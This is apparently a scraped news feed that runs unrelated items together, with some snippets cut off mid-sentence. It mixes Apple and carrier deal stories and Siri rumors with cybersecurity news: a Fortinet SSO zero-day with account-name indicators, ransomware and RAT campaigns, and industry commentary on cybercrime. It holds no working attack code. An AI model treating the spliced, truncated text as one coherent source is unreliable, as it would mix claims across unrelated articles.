Samsung recently introduced a sale across its most popular Vision AI-supported monitors and TVs, with notable markdowns on products like The Frame and the Smart Monitor series. These deals have all been applied automatically on Samsung's website, and many match all-time low prices on these products.

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




This article, "Best Apple Deals of the Week: Apple Studio Display Hits Lowest Prices in Months, Plus Accessory Discounts From Satechi and More" first appeared on MacRumors.com

A new multi-stage phishing campaign has been observed targeting users in Russia with ransomware and a remote access trojan called Amnesia RAT. "The attack begins with social engineering lures delivered via business-themed documents crafted to appear routine and benign," Fortinet FortiGuard Labs researcher Cara Lin said in a technical breakdown published this week. "These documents and
The Russian nation-state hacking group known as Sandworm has been attributed to what has been described as the "largest cyber attack" targeting Poland's power system in the last week of December 2025. The attack was unsuccessful, the country's energy minister, Milosz Motyka, said last week. "The command of the cyberspace forces has diagnosed in the last days of the year the strongest attack on
AI agents are accelerating how work gets done. They schedule meetings, access data, trigger workflows, write code, and take action in real time, pushing productivity beyond human speed across the enterprise. Then comes the moment every security team eventually hits: “Wait… who approved this?” Unlike users or applications, AI agents are often deployed quickly, shared broadly,
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw affecting Broadcom VMware vCenter Server that was patched in June 2024 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The vulnerability in question is CVE-2024-37079 (CVSS score: 9.8), which refers to a heap overflow in the
Cloud migration is often viewed through the lens of efficiency and cost savings. While these are valid drivers, the most successful migrations are those that prioritize a “Security-by-Design” architecture. Leveraging AWS cloud migration services allows businesses to move workloads with minimal downtime, but the transition period itself is a high-risk window for data exposure.
As you shift from on-premises legacy systems to the elastic nature of AWS, your security perimeter changes. You are no longer just guarding a physical server; you are managing identity access, encrypted data flows, and misconfigured S3 buckets.
The Hybrid Security Approach
In 2026, the most resilient enterprises adopt a multi-layered defense strategy. This involves:
Phased Migration: Moving non-critical workloads first to test security protocols.
Continuous Monitoring: Using AI-driven tools to detect anomalies in real time.
Proactive Testing: Validating that the new cloud environment is actually as secure as it was designed to be.

Strengthening the Perimeter: Penetration Testing vs. Vulnerability Scanning
Once your migration is underway, the question shifts from how you move to how you protect. A common point of confusion for many IT managers is the difference between penetration testing vs vulnerability scanning. While they may sound similar, they serve two distinct functions in your security lifecycle.
Feature    | Vulnerability Scanning                        | Penetration Testing
Nature     | Automated and scheduled.                      | Manual and goal-oriented.
Goal       | Identifies known “holes” or missing patches.  | Simulates a real-world hacker to exploit gaps.
Frequency  | High (Weekly/Monthly).                        | Low (Annually or after major changes).
Depth      | Surface-level “snapshot” of risks.            | Deep-dive into exploitability and impact.

Why You Need Both
Think of vulnerability scanning as a motion-sensor light on your house; it alerts you whenever something moves in the yard. It is essential for routine hygiene and meeting compliance standards like PCI DSS or SOC2.
Penetration testing, however, is like hiring a professional locksmith to see if they can actually pick your locks and get to the safe. In a cloud environment, a pen tester doesn’t just find an open port; they demonstrate how that port could be used to escalate privileges and exfiltrate sensitive customer data.
Conclusion: A Secure Future in the Cloud
A successful digital transformation requires a balance of speed and safety. By utilizing professional AWS cloud migration services, you ensure your infrastructure is scalable and modern. By integrating both vulnerability scanning and penetration testing, you ensure that your new digital home is fortified against the sophisticated threats of the modern era.
Fortinet has confirmed that a new attack campaign observed recently against customer devices is exploiting an unpatched issue to bypass authentication. The new attacks are different from a previous campaign seen in December that targeted two vulnerabilities related to FortiCloud single sign-on (SSO) authentication.
“Recently, a small number of customers reported unexpected login activity occurring on their devices, which appeared very similar to the previous issue,” the Fortinet product security team said in a blog post. “However, in the last 24 hours, we have identified a number of cases where the exploit was to a device that had been fully upgraded to the latest release at the time of the attack, which suggested a new attack path.”
Fortinet is currently working on fixing the new issue, which impacts not only FortiCloud SSO, but all SAML SSO implementations. It’s worth noting that FortiCloud SSO is not enabled by default on devices but can become enabled when an administrator registers the device with FortiCare product support from the device’s management interface.
Reports of similar attacks
Fortinet patched two improper cryptographic signature verification issues, CVE-2025-59718 and CVE-2025-59719, in December. These flaws could be exploited to bypass authentication on devices with FortiCloud SSO enabled by sending specially crafted SAML messages.
Soon after the patches were released, attackers reverse engineered them and launched a campaign to extract configuration files from vulnerable devices. Those files included hashed credentials for other user accounts and details that would allow network mapping.
This week, researchers from security firm Arctic Wolf reported seeing a new attack campaign that started around Jan. 15 in which attackers similarly extracted firewall configurations but also used their access to create new generic accounts and give VPN access to them.
The company noted at the time that it was unsure whether this activity was related to the two December vulnerabilities or to a new zero-day vulnerability. Fortinet has now confirmed the latter.
The December flaws affected FortiOS, FortiWeb, FortiProxy, and FortiSwitch Manager, so it’s reasonable to assume the new issue impacts the same devices.
The Fortinet blog post references the same indicators of compromise listed in the Arctic Wolf report, namely malicious accounts created with the email addresses [email protected] and [email protected]. Other admin accounts are created with the names: audit, backup, itadmin, secadmin, and support.
Mitigation
If these or other IOCs such as IP addresses are identified in configurations or the device logs, the system and its configuration should be considered compromised. Fortinet recommends updating the device to the latest available software release, restoring a configuration from a clean backup, and rotating all credentials, including any LDAP/AD accounts that may be connected to the FortiGate devices.
The setting “Allow administrative login using FortiCloud SSO” should be set to off, but if any third-party SSO systems are enabled they can still be abused. Administrative access should not be enabled from the Internet for network-edge devices, so Fortinet PSIRT shared a policy configuration that restricts access to the administrative interface only to specific subnets of IP addresses.
Apple is planning to upgrade Siri twice in the coming year, adding personalization features in iOS 26.4 before turning the personal assistant into a full chatbot in iOS 27.


As long as timelines don't change, we'll see the ‌Siri‌ chatbot as soon as June 2026. Here's everything we know so far.

SiriBot

With iOS 27, Apple will change the way that ‌Siri‌ works. Right now, ‌Siri‌ can answer basic questions and complete simple tasks, but you can't engage it in a back and forth conversation, get help with multi-step tasks, or ask complicated questions.

Based on the current ‌Siri‌ chatbot rumors, ‌Siri‌ will be able to do all of that and more with the upcoming upgrade, and it will work like competing chatbots.

Apple wasn't initially planning to introduce a full chatbot that users can interact with similarly to Claude or ChatGPT, but chatbots have become too popular for Apple to ignore. Simply adding AI capabilities to apps and features isn't enough for Apple to stay competitive with the way people have embraced chatbots for everything from web searches to coding help.

Google has already integrated Gemini into a range of Android devices, and chatbots like ChatGPT have hundreds of millions of weekly active users.

Siri Capabilities

According to Bloomberg's Mark Gurman, ‌Siri‌'s chatbot capabilities will be "embedded deeply" into Apple's products at the system level. ‌Siri‌ won't be an app, but will instead be integrated into iOS, iPadOS, and macOS like ‌Siri‌ is now.

Siri Activation and Interface

Users will activate ‌Siri‌ in the same way they do today, speaking the ‌Siri‌ wake word or pressing on the side button of a Siri-enabled device. ‌Siri‌ will be able to respond to both voice and text-based requests.

We don't yet know what the new ‌Siri‌ interface will look like. Apple will need to make big changes to the way that ‌Siri‌ looks and feels if it wants to match functionality offered by companies like OpenAI, Anthropic, and Google.

People are used to opening up an app and having a full text interface that includes conversation history, and it's not clear how Apple will provide that if there's no dedicated ‌Siri‌ chatbot app. People will want to be able to access their past conversations and have tools for uploading files and images.

It's possible activating ‌Siri‌ could lead to an app-like interface that takes over the iPhone, iPad, or Mac's display, but that will be a departure from ‌Siri‌'s current minimalistic design. Apple could alternatively log conversations in a place like the Notes app, or in the clipboard on the Mac.

Gurman says that ‌Siri‌ won't be an app, but that might mean that it won't only be an app. There could be some kind of dedicated chatbot app that people can use, with ‌Siri‌ also able to be activated and used on a system level and in and across apps.
What Siri Chatbot Can Do

It sounds like the ‌Siri‌ chatbot will be able to do everything that current chatbots can do, and more.

Search the web for information
Generate images
Generate content
Summarize information
Analyze uploaded files
Use personal data to complete tasks
Ingest information from emails, messages, files and more
Analyze open windows and on-screen content to take action
Control device features and settings
Search for on-device content, replacing Spotlight

‌Siri‌ will also be integrated into Apple's core apps, including Mail, Messages, Apple TV, Xcode, and Photos. ‌Siri‌ will be able to search for specific images, edit photos, help with coding, make suggestions for TV shows and movies, and send emails.

iOS 26.4 "LLM Siri" vs. Chatbot Siri

In iOS 26.4, Apple plans to introduce a new, updated version of ‌Siri‌ that relies on large language models, or LLMs. Apple has been working on this version of ‌Siri‌ since Apple Intelligence features were added to iOS 18, but it was delayed because ‌Siri‌'s underlying architecture needed an overhaul to run LLMs.

Starting in iOS 26.4, ‌Siri‌ will be able to hold continuous conversations and provide human-like responses to questions, plus ‌Siri‌ will have new personalization features that will let it do more than before. What ‌Siri‌ won't have, though, is full chatbot capabilities. Here's what we're expecting:

Personal Context

With personal context, ‌Siri‌ will be able to keep track of emails, messages, files, photos, and more, learning more about you to help you complete tasks and keep track of what you've been sent.

Show me the files Eric sent me last week.
Find the email where Eric mentioned ice skating.
Find the books that Eric recommended to me.
Where's the recipe that Eric sent me?
What's my passport number?

Onscreen Awareness

Onscreen awareness will let Siri see what's on your screen and complete actions involving whatever you're looking at. If someone texts you an address, for example, you can tell Siri to add it to their contact card. Or if you're looking at a photo and want to send it to someone, you can ask Siri to do it for you.

Deeper App Integration

Deeper app integration means that Siri will be able to do more in and across apps, performing actions and completing tasks that are just not possible with the personal assistant right now. We don't have a full picture of what Siri will be capable of, but Apple has provided a few examples of what to expect.

Moving files from one app to another.
Editing a photo and then sending it to someone.
Get directions home and share the ETA with Eric.
Send the email I drafted to Eric.

You're not going to have a chat-like interface for back-and-forth conversations with Siri when iOS 26.4 launches, but the personal assistant should be very different from what it is now. Apple software engineering chief Craig Federighi told employees last summer that the Siri revamp was successful. "This has put us in a position to not just deliver what we announced, but to deliver a much bigger upgrade than that we envisioned," he said.

Siri Redesign

With all of the new functionality coming to Siri, Apple is planning to make visual design changes. It's not quite clear what that will entail, but for the upcoming table-top robot that's in the works, Apple has tested an animated version of Siri that looks similar to the Mac's Finder logo.

Apple could start rolling out that new, more personalized design when Siri gets the major iOS 27 revamp.

Memory

Claude, ChatGPT, and Gemini can remember past conversations and interactions, retaining a memory of the user. Apple is said to be discussing how much the Siri chatbot will be able to remember.

Apple may limit conversational memory to protect user privacy.

Naming

Siri is getting a major overhaul, but Apple will probably continue to refer to it as Siri. It'll just be a much smarter version of Siri.

Underlying Architecture and Servers

Apple has inked a deal with Google that will see Gemini powering upcoming versions of Siri. Apple plans to use Gemini for the iOS 26.4 updates that it is introducing, and Google's technology will also power the Siri chatbot.

"Apple and Google have entered into a multi-year collaboration under which the next generation of Apple Foundation Models will be based on Google's Gemini models and cloud technology," the two companies said in a statement in January.

The Siri chatbot specifically will rely on a custom AI model developed by the Google Gemini team. Gurman claims that the custom model is comparable to Gemini 3, and that it will be much more powerful than the model behind Apple's upcoming iOS 26.4 features.

Apple and Google are also discussing running the Siri chatbot on Google's servers powered by Tensor Processing Units, probably because Apple doesn't yet have the infrastructure to handle chatbot queries from billions of active devices per day.

In the future, Apple will be able to transition Siri to a different underlying model, so when the company does have in-house LLMs powerful enough to compete with ChatGPT or Gemini, it can move away from Google. Apple will also potentially be able to offer chatbot capabilities in China by partnering with a Chinese AI company.

China restricts foreign companies from offering AI features in the country.

Platforms

Siri's chatbot functionality will be the key new feature in iOS 27, iPadOS 27, and macOS 27, and Siri's capabilities will be integrated into the iPhone, iPad, and Mac. Siri chatbot features could also come to other platforms like visionOS and tvOS.

Cost

There is no word yet on whether there will be some kind of fee associated with the Siri chatbot. The Siri chatbot won't be able to run entirely on device, and Apple is going to need major cloud processing power. Without taking into account any development or hosting costs, Apple is paying Google approximately $1 billion per year for access to Google's models.

Companies like Google and OpenAI spend billions on infrastructure and compute costs each year, and no AI service is entirely free. Apple will likely need to charge something, but it could do what Google has done with Gemini.

Google offers a free version of Gemini on Pixel smartphones and other Android devices that have integrated AI. The basic version of Gemini is able to answer questions, summarize text, write emails, and control apps and smartphone features.

Android users can pay $20 per month for Gemini Advanced to get access to the more advanced version of Gemini that offers better reasoning, longer context for analyzing bigger documents, and improved coding.

Launch Date

Apple is planning to introduce Siri's chatbot capabilities when it announces iOS 27, iPadOS 27, and macOS 27 at the June Worldwide Developers Conference. If the chatbot features aren't ready to go, Apple will likely hold off on showing off the new functionality because of the major mistake it made with iOS 18 and Apple Intelligence.

The Siri chatbot is expected to be introduced in the new updates in September after several months of beta testing.
This article, "Apple's Siri Chatbot in iOS 27: Everything We Know" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Canadian carrier Public Mobile has launched a limited-time flash sale that offers 50% off its 5G Canada — U.S. — Mexico plans for a two-year period.


Here are the discounted plans available to new customers through January 26, with each also including unlimited calling and text messaging:
60GB of 5G data for $20 per month (regularly $40 per month)
80GB of 5G data for $25 per month (regularly $50 per month)
100GB of 5G data for $30 per month (regularly $60 per month)

Public Mobile says these discounted plans are available for new activations only, but existing customers seem to be able to take advantage of the lower prices too. In the Public Mobile app, tap on Manage Subscription → Change Subscription, and select the 100GB plan for $40 per month. If you switch to that plan, Public Mobile is currently applying the 50% discount for 24 months, meaning you can get 100GB for just $20 per month.

Here is what the app shows when you switch plans upon renewal:


Here is what the app shows when you switch plans immediately:


For a limited time, Public Mobile is offering customers a free eSIM.

You can use your allotted data while roaming in the U.S. and Mexico at no additional cost, but note that Public Mobile limits 5G speeds to up to 250 Mbps. And after the allotted amount, data speeds are reduced to a maximum of just 512 Kbps.

Public Mobile is a prepaid carrier, meaning that you pay upfront for your monthly plan, with no credit check required. You can cancel your subscription at any time.

As a Telus subsidiary, Public Mobile uses the Telus network in Canada. However, Public Mobile customers may be deprioritized in busy areas if necessary, and cellular coverage can vary based on your location. All in all, service might not always be comparable to a major carrier like Bell or Rogers, but your mileage may vary.
This article, "Public Mobile Offering Up to 100GB of 5G Data for $20/Month in Canada" first appeared on MacRumors.com

iOS 26.3 is shaping up to be a relatively minor update, with only a couple of notable new features, but iOS 26.4 is expected to be much more significant.


We are still waiting for the iOS 26.3 Release Candidate to come out, so the first iOS 26.4 beta is likely still at least a few weeks away. Following beta testing, iOS 26.4 will likely be released to the general public at some point in March or April.

Below, we have recapped known or rumored iOS 26.4 features so far.

Personalized Siri


Earlier this month, Apple and Google announced that Google Gemini will help power a more personalized version of Siri coming this year.

The more personalized version of Siri is expected to be introduced with iOS 26.4, following a lengthy delay. The new capabilities will include better understanding of a user's personal context, on-screen awareness, and deeper per-app controls, but some of this functionality might not be available until iOS 27 later this year.

For example, all the way back at WWDC 2024, Apple showed an iPhone user asking Siri about their mother's flight and lunch reservation plans based on info retrieved from the Mail and Messages apps.

Looking ahead, Apple is reportedly planning to launch a full-out Siri chatbot on iOS 27, allowing users to have ChatGPT-like conversations with Siri.

New Emoji


Last year, the Unicode Consortium previewed some of the new emoji that are expected to be added to the iPhone with iOS 26.4.

Here are nine of the new emoji:
Trombone
Treasure Chest
Distorted Face
Hairy Creature (aka Bigfoot or Sasquatch)
Fight Cloud
Apple Core
Orca
Ballet Dancers
Landslide

Apple most recently added new emoji to the iPhone with iOS 18.4, an update that came out in March last year. iOS 17.4, iOS 16.4, and iOS 15.4 also introduced new emoji over the years, so the timing has become predictable by this point.

More

Macworld's Filipe Espósito last month leaked some other potential iOS 26.4 features:
If you have credit card information stored in Apple's Passwords app, you will be able to AutoFill those details in third-party apps.
You will be able to create folders in the Freeform app.
Apple is apparently working on a new sports tier for the Apple TV app, but the report did not offer any further details about this.
There are signs of "a new validation system that will check the integrity of the device before logging into Apple ID and iCloud."
A new "Precise Outdoor Location" feature for AirPods in the Find My app.

Of course, there will be additional iOS 26.4 features that are still unknown, so stay tuned.
This article, "What to Expect From iOS 26.4" first appeared on MacRumors.com

Cybercriminals have built structured criminal groups with an organizational model similar to that of a legitimate business. “Cybercrime has become industrialized, a return on investment (ROI)-oriented economy, focused on speed and monetization,” according to Martin Zugec, Bitdefender’s director of technical solutions.
Zugec explains that this modus operandi of cybercriminal groups is characterized by a high degree of specialization, which includes initial access brokers or ransomware-as-a-service (RaaS) affiliates. “Today, sophistication is not measured by the complexity of the tools, but by the simplicity and speed of the execution chain,” says Zugec.
This change requires a shift from a threat detection-based approach to one focused on prevention. “Detection has become a commodity that attackers routinely evade, so organizations must go beyond reactive monitoring,” says Zugec. “The goal should be to break attackers’ playbooks and make internal environments inherently hostile to them through proactive hardening that eliminates the operational space they need to succeed.”
The business of cybercrime isn’t new
“Cybercrime has been operating as an industry for years, meaning it has become professionalized and attacks have been modularized,” says Guillermo Fernández, director of sales engineering for southern Europe at WatchGuard Technologies.
In practice, this means that it is no longer necessary for a single attacker to know how to do everything, but rather that the crime is divided into specialties (some steal and resell credentials, others develop and maintain ransomware, others provide infrastructure and negotiation, etc.) and all of this is packaged into models as a service, as we see in the case of ransomware-as-a-service. “This lowers the barrier to entry and reduces the cost of attacking, which explains why we are seeing more and more campaigns and higher volumes,” says Fernández.
In addition, AI helps accelerate the scale and sophistication of some phases or tasks, such as reconnaissance, personalization of deceptions, or automation of parts of the process.
How big is it? “The global economic impact of cybercrime is close to $10 trillion. If it were a country’s economy, it would be one of the three world powers, behind only the United States and China. For organizations, this means that it is not enough to react to incidents. Defense must take the same business approach: anticipation, risk management, operational continuity, and resilience by design,” says Juan Francisco Moreda, director of /fsafe, Fibratel’s cybersecurity unit.
As a result, cybercrime has become a fully industrialized criminal economy, according to Moreda. “Today we are talking about highly specialized organizations, with as-a-service models (ransomware, phishing, malware), their own supply chains, and a clear focus on profitability and scalability.”
That is why Martín Trullás, director of Advanced Solutions at Ingram Micro Spain, believes that cybercrime operates with well-organized structures, different professional profiles in its ranks, short- and long-term objectives, and financing that allows it to improve its model with new technology and new strategies to achieve the success of its operations.
“Cybercriminals are no longer isolated individuals with computer skills and a desire for quick and easy money, but actors who, in some cases, appear to have state support to use them as part of a struggle that transcends the economic and digital spheres and often enters the realm of geopolitics.”
However, in his opinion, there are still simple gangs of cybercriminals whose goal is money or data, which they then turn into profit by reselling it to third parties. “What’s happening is that they now have better access to more powerful technologies with which they can streamline their operations, attacking with greater speed and in a massive and scalable way. This changes the approach to cyber defense: we can no longer be reactive, equipping companies and users with different levels of ‘shields’ and sitting back to wait for the attack to repel it, but rather we must take action,” Trullás adds.
That is why Trullás believes that the best cyber defense strategy must combine passive security with active monitoring of the entire digital ecosystem of the company or user, to reduce the time taken to detect and respond to an incident to limit damage.
Evolution of the security strategy
Alessandro Armenia, global head of cybersecurity at ReeVo, believes that three key aspects are emerging in the current landscape: “First, attacks are no longer isolated events, but coordinated, in some cases automated, operations that often originate within the organizations themselves, for example, due to human error or exposed credentials. Second, the time factor plays a decisive role: even today, many companies realize they are under attack when it is already too late. Finally, the attack surface is growing faster than companies’ ability to manage it.”
As a result, the defense strategy must also evolve. “It can no longer be based solely on compliance or one-off interventions, but must be continuous, structured, and resilience-oriented,” Armenia explains.
And that’s despite the fact that companies have the necessary tools to manage their attack surface. “Where they often fail is in the governance model: cybersecurity continues to be approached as a series of isolated compliance exercises over time, and it is precisely in the gaps between one exercise and another that the attacker manages to infiltrate and carry out the attack.”
The reality is that an IT outage becomes a serious problem when the company does not have a plan. “A prepared organization, with defined and tested procedures, is able to recover in a matter of minutes; those that are not prepared run the risk of losing hours, days, and, in some cases, their reputation,” Armenia concludes.
Cybercriminals, for their part, now have organizational models similar to those of companies. “You can see that there are different types of profiles in these groups, depending on the size of the organization, from the more technical ones, who work in a coordinated team, to the more commercial ones, who are in charge of dealing with victims when negotiation is necessary,” warns David Sancho, senior threat researcher at Trend Micro.
Furthermore, Sancho explains that “they often also have people who are responsible for selling the product created to partners or customers, which in the business world would correspond to the channel or the marketing. This is already a reality.”
Established groups
Abraham Vázquez, pre-sales engineer at Infinigate Iberia, gives examples such as the DragonForce or Anubis groups, which “operate as genuine criminal service providers, offering infrastructure, management panels, technical support, and different extortion models. It is a highly fragmented ecosystem, but at the same time very resilient, capable of adapting and regenerating quickly.”
This leads him to conclude that the main implication for defense is that it is no longer enough to react to the final attack. “It is necessary to disrupt the entire criminal chain, reinforcing identity as a central pillar of security, prioritizing proper credential hygiene, greater telemetry capabilities, and rapid containment mechanisms that limit the impact from the early stages of the attack,” Vázquez adds.
And the outlook is not promising. “According to the World Economic Forum, the cybercrime economy will continue to grow, reaching $23 trillion by 2027. Industrialized ransomware, automated fraud networks, and converging crime models will drive this growth,” says Gorka Sainz, director of systems engineering at Fortinet Iberia.
The role of AI and automation
“AI is the new fuel for the criminal economy. It allows them to scale attacks as if they were marketing campaigns,” argues Salvador Sánchez Taboada of CyberProof UST.
A glance at the business landscape is enough to see that artificial intelligence has become a real multiplier of scale for the criminal economy, enabling the generation of highly granular and personalized phishing campaigns on demand, as Abraham Vázquez argues. “This includes everything from deepfakes of executives to increasingly evasive malware, supported by tools such as WormGPT or FraudGPT. Thanks to these capabilities, attacks are more credible, difficult to detect, and easy to replicate.”
As an example, CrowdStrike’s Threat Hunting report 2025 reveals how cybercriminals are targeting the tools used to build AI agents. “Their goal is to gain access, steal credentials, and deploy malware, highlighting how autonomous systems and non-human identities are a key part of today’s enterprise attack surface and a growing enabler of large-scale automated attacks,” says Álvaro del Hoy, technology strategist at CrowdStrike.
Add to this that criminal groups are integrating generative AI directly into ransomware, “using it to automatically create variants and optimize processes such as executing attacks, negotiating with victims, and extortion strategies,” says Abraham Vázquez.
On the other hand, automation is key to streamlining access, lifecycle, and permission processes, but attackers also seek to exploit identities and privileges at scale, says Albert Barnwell, director of sales for Iberia at CyberArk.
“This means that offensive automation allows cybercriminals to move faster and exploit compromised identities without friction. Thus, organizations must respond with defensive automation, especially in the management of identity lifecycle, permissions, and rights,” Barnwell adds.
We are already reaching a point where the entire attack cycle can be automated through orchestration: agents who investigate a company and its employees (including social media footprints, interests, and potential weaknesses), others who generate highly targeted and convincing phishing, and chains that lead to malware infection, according to Guillermo Fernández. “From there, the malware itself can learn about the environment and find out what tools and defenses are in place within the company in order to adjust its technique and maximize its impact,” he says.
And this doesn’t stop at initial access, as even extortion can be automated. It is even possible for the ransom negotiation to be carried out by a bot that adapts its discourse and conditions based on the responses to squeeze out the payment.
Martin Zugec says AI is not a magic bullet for attackers. While it has significantly helped to scale social engineering attacks, removing language barriers and improving the quality of decoys, these tools are not particularly useful for the heavier work of an intrusion.
“We see very little evidence that AI is successfully replacing human expertise in vulnerability research or exploit development. The RaaS ecosystem relies on trust and human ingenuity. The main drivers of successful attacks continue to be hackers and affiliates who operate manually and navigate complex networks. The question is not what AI is capable of doing in theory, but whether it makes sense from an economic standpoint. For a professional threat actor, the cost of managing, adjusting, and securing an AI framework often outweighs the efficiency gains over traditional and proven hacking techniques,” Zugec elaborates.
Main threats and attack vectors in 2026
The current geopolitical context does not invite optimism either. Carlos Castañeda-Marroquin, head of pre-sales and business development at Serval Networks, believes that “in 2026, we will see an increase in hybrid threats driven by geopolitical tensions, where cyberspace is used as an extension of economic and strategic conflicts between states and related groups. This will translate into espionage, digital sabotage, and disinformation campaigns targeting both critical infrastructure and key industrial sectors.”
The theft of credentials and tokens, the use of infostealers, or the abuse of valid access, combined with a greater emphasis on malware-free techniques and hands-on-keyboard activity, have been gaining ground in recent months, according to David López García, director of operations at Factum. All of this leads, in many cases, to system intrusions that evolve into ransomware and extortion, with increasingly shorter, more automated attack cycles that are clearly aimed at operational and economic impact.
López García also warns that in 2026, the extended perimeter and relationships with third parties will gain prominence. “Faced with a larger surface area of exposure, cybercriminals find more opportunities to exploit configurations, identities, and external dependencies, with a greater likelihood of finding a breach in the supply chain.”
Consequently, the challenge for organizations is no longer just to protect their systems but to effectively govern an interconnected digital ecosystem, where trust becomes one of the most critical assets and having solid solutions or allies is an operational necessity.
In terms of attack vectors, Guillermo Fernández believes that vulnerabilities and weak configurations in remote access and VPNs will continue to be prominent, in addition to the compromise of SaaS tools (accounts, permissions, integrations). “And on the human front, social engineering will become even more effective with advanced phishing and image and voice deepfakes, increasing the risk of fraud. Likewise, we will see more impersonation and initial access. WatchGuard also anticipates that 2026 may be the year of the first agent-based AI-orchestrated end-to-end breach, bringing offensive automation to ‘machine speed’,” Fernández says.
Are companies investing enough in cyber defenses?
Rafe Pilling, director of threat intelligence at Sophos X-Ops, points to a ‘cybersecurity poverty line’ that affects not only budgets, but also the availability of strategic leadership and the capabilities needed to define roadmaps, understand key metrics, and evolve toward maturity goals. “The strong performance of the cybersecurity market does not eliminate the fundamental gap between real risk and management perception. Sophos predicts that many of the most serious disruptions in 2026 will not be the result of sophisticated techniques, but of basic security hygiene failures that are entirely preventable,” he explains.
Pilling argues that the reality is that having a CISO in a company is now a luxury, highlighting the magnitude of the specialized talent deficit. Companies must understand cyber resilience as a strategic priority at the management level and not just as a technological challenge. This gap between available capabilities and real threats explains why most organizations lack the visibility, controls, and expertise necessary to defend themselves effectively against a highly industrialized criminal ecosystem.
What is clear is that as cyber threats increase, organizations are facing the reality that security attacks are not just a possibility, but a certainty. “At the same time, it is estimated that there is a global shortage of more than 4.7 million qualified professionals, which means that critical security positions are not being filled when they are most needed,” says Gorka Sainz.
“There remains a clear gap in effectiveness,” says Abraham Vázquez. In his opinion, “many organizations still lack real visibility into their risk exposure, boards of directors maintain a limited level of confidence in defensive capabilities, and third parties continue to play a significant role, being involved in approximately 30% of security breaches.”
On the other hand, there is still a gap between the complexity of the environment (hybrid, SaaS, multi-cloud) and the maturity of identity controls. Likewise, many organizations still do not consistently apply intelligent privilege controls, while the need to automate the identity and permission lifecycle indicates that current investment is not always sufficient or well targeted.
And not only does this gap exist, but there is also a cultural gap, as Salvador Sánchez Taboada points out. “Many management teams see cybersecurity as an expense, not as a lifesaver,” he acknowledges. “In Spain and Latin America, we are working to change that view, relying on integration through AI between existing risk plans and new threats: investing in resilience is like investing in good foundations before building a house. Every change of cycle reminds us that the invisible—like foundations—supports everything we value.”
Increased spending “is often diverted toward AI hype and supposedly miraculous solutions driven by marketing, rather than addressing real risks,” argues Martin Zugec. Meanwhile, he notes, attackers have evolved toward simpler, harder-to-detect techniques, such as living-off-the-land (LOTL) or ClickFix, which weaponize legitimate system tools and user interactions to bypass security layers.
“This disconnect between where defenders invest and how attackers evolve is a dangerous trend, clearly visible when comparing the findings of real forensic investigations with the narratives popularized in professional networks. This disconnect is reckless,” he warns.
CISO priorities
In this context, CISOs are forced to continually rethink their defense strategies. “Beyond having solid internal teams and adequate prevention tools, it is increasingly necessary to complement these capabilities with trusted technology partners and insurers capable of managing cyber risk in a more holistic way,” says Vincent Nguyen, director of cybersecurity at Stoïk.
As attackers professionalize and scale their operations, Nguyen believes that effective defense requires a proactive and integrated approach that combines advanced cybersecurity solutions, risk transfer through cyber insurance, and operational support when an incident occurs. “Strategic partners with a cross-functional view of risk can accompany organizations before, during, and after an attack, strengthening resilience without replacing internal security leadership,” he adds.
In any case, Martín Trullás acknowledges that there is no single winning strategy for the CISO, but rather a set of different strategies focused on different areas. “On the one hand, identity security must be strengthened, as it can become a gateway for more serious attacks. And this identity security should no longer be understood only as ‘human identity’ but must also focus on the identity of connected devices, which can also become vectors for attack,” he explains.
“At the same time, it is necessary to implement organizational and mindset changes within the company: proper governance, cybersecurity training for all employees, promotion of best practices to reduce risks, and a culture of proactivity to reduce detection and response time in the event of an attack. The entire company must be involved in these processes, because leaving cybersecurity as the sole responsibility of the CISO or the department on duty is a mistake that can be very costly.”
Of course, this requires CISOs to have the right resources. “And they don’t have it easy, with often unrealistic expectations that cause them to experience signs of burnout,” says Fernando Anaya, general manager of Proofpoint for Spain and Portugal.
Anaya cites this data: “In Spain, 51% of security managers say they still lack the necessary means to meet their objectives. Similarly, it is crucial to strengthen incident response capabilities, especially considering that a third of Spanish organizations admit to being unprepared. A much more proactive approach is also needed to foster a culture of cybersecurity that goes beyond simply trusting users and includes concrete and effective actions to reduce data loss. The pressure on CISOs is increasing as these resource constraints are combined with such a rapidly changing threat environment, making it imperative that they work to align themselves strategically with their organizations’ boards of directors, seeking a shared vision that ensures the necessary support and appropriate decision-making.”
At the same time, Abraham Vázquez believes that it will be essential to advance zero-trust models and perimeter hardening, eliminating legacy VPNs and accelerating patching processes in edge environments, as well as ensuring proven resilience through immutable backups and isolated recovery environments. “The automation of detection and response, supported by SOAR and AI platforms, will enable the cycle between detection and containment to be closed efficiently, effectively reducing response times. Added to this is the need for more mature third-party and supply chain management, based on continuous assessment of cybersecurity posture and minimal but relevant telemetry.”
“It will be key to conduct internal crisis management exercises that consider realistic scenarios, such as ransomware attacks without payment, fraud using deepfakes of management, or outages of critical suppliers.”

Apple today began notifying Apple Cash users about an upcoming fee increase for the Instant Transfer feature. Starting on February 18, 2026, choosing the Instant Transfer option will cost 1.7 percent of the transaction amount, with a minimum of $0.25 and a maximum of $25.


Instant Transfer is the Apple Cash option that allows you to transfer money from Apple Cash to your bank account with no waiting period. The current fee is 1.5 percent of the transaction amount, with the same $0.25 minimum fee and a lower $15 maximum fee.

Using Instant Transfer to deposit $1,000 from Apple Cash to a bank account currently requires users to pay a $15 fee, for example, but that will increase to $17 after February 18.

An ACH transfer that takes one to three business days will continue to have no fee, and that is always an option for Apple Cash users.

Transferring money from Apple Cash to a bank account can be done by choosing the Apple Cash card in the Wallet app, tapping on the three-dot more button, and then selecting the Transfer to Bank option.

Apple Cash continues to be limited to the United States. It can be used to send and receive money from friends and contacts right in the Messages app as an alternative to services like Venmo, Zelle, or PayPal.
Tag: Apple Cash
This article, "Apple Cash Instant Transfer Fees Are Going Up Soon" first appeared on MacRumors.com


View the full article
We’re proud to share that NETSCOUT has been recognized for industry-leading excellence in network detection and response (NDR). This acknowledgment, from Quadrant Knowledge Solutions’ 2025 SPARK Matrix™ for NDR, highlights what our customers already know: NETSCOUT delivers unmatched visibility, precision, and forensic depth across the world’s most complex digital ecosystems.
Below are the strengths that set us apart and continue to define our leadership.
The visibility gap no one wants to talk about
Many organizations still rely on flow-based data or siloed tools that provide snapshots rather than full context. These tools can tell you that something happened, but not what, not how, and not why.
